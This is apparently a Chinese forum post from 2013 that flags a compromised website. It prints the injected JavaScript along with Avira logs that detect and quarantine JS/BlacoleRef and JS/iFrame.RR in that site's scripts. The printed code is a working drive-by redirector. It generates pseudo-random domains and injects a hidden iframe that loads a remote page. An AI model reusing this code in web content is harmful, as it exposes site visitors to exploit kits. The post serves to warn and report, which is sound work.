http://inonu.edu.tf/

显示全部楼层 · 发表于 2013-9-5 18:48:57

function nextRandomNumber() {
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if (test > 0) {
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.seed * this.oneOverM);
}
function RandomNumberGenerator(unix) {
var d = new Date(unix * 1000);
var s = Math.ceil(d.getHours() / 3);
this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
this.A = 48271;
this.M = 2147483647;
this.Q = this.M / this.A;
this.R = this.M % this.A;
this.oneOverM = 1.0 / this.M;
this.next = nextRandomNumber;
return this;
}
function createRandomNumber(r, Min, Max) {
return Math.round((Max - Min) * r.next() + Min);
}
function generatePseudoRandomString(unix, length, zone) {
var rand = new RandomNumberGenerator(unix);
var letters = "qmahgwctopfjilrfpjrfcwgewheizwdw".split('');
var str = '';
for (var i = 0; i < length; i++) {
str += letters[createRandomNumber(rand, 0, letters.length - 1)];
}
return str + '.' + zone;
}
setInterval(function() {
try {
if (typeof iframeWasCreated == "undefined") {
var unix = Math.round(+new Date() / 1000);
var domainName = generatePseudoRandomString(unix, 16, 'mynumber.org');
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "http://" + domainName + "/in.cgi?14");
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
iframeWasCreated = true;
}
} catch (e) {
iframeWasCreated = undefined;
}
}, 100);

复制代码

Avira

2013/9/5 下午 06:45 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描。]。
   檔案數： 840
   目錄數： 0
   惡意程式碼數： 1
   警告數： 0

2013/9/5 下午 06:45 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\AVC3APW1\jquery[5].js'
   包含病毒或有害的程式 'JS/BlacoleRef.W.73' [virus]
   已採取動作：
   檔案會移動至 '5455c359.qua' 名稱底下的隔離區目錄。.

2013/9/5 下午 06:45 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描。]。
   檔案數： 844
   目錄數： 0
   惡意程式碼數： 1
   警告數： 0

2013/9/5 下午 06:45 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\R8AOCKPW\imgbubbles[1].js'
   包含病毒或有害的程式 'JS/iFrame.RR' [virus]
   已採取動作：
   檔案會移動至 '54e6c0d5.qua' 名稱底下的隔離區目錄。.

2013/9/5 下午 06:43 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\R8AOCKPW\imgbubbles[1].js 中
   偵測到病毒或有害的程式 'JS/iFrame.RR [virus]'
   執行的動作：傳輸至掃描程式

2013/9/5 下午 06:42 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\R8AOCKPW\imgbubbles[1].js 中
   偵測到病毒或有害的程式 'JS/iFrame.RR [virus]'
   執行的動作：拒絕存取

2013/9/5 下午 06:42 [Web Protection] 發現惡意程式碼
   從 URL "http://inonu.edu.tf/imgbubbles.js" 存取資料時，
   發現病毒或有害的程式 'JS/iFrame.RR' [virus]。
   已採取動作：已略過

2013/9/5 下午 06:42 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\AVC3APW1\jquery[5].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.W.73 [virus]'
   執行的動作：傳輸至掃描程式

2013/9/5 下午 06:42 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\AVC3APW1\jquery[5].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.W.73 [virus]'
   執行的動作：拒絕存取

2013/9/5 下午 06:42 [Web Protection] 發現惡意程式碼
   從 URL "http://inonu.edu.tf/clientscript/jquery.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.W.73' [virus]。
   已採取動作：已略過

[已鉴定] http://inonu.edu.tf/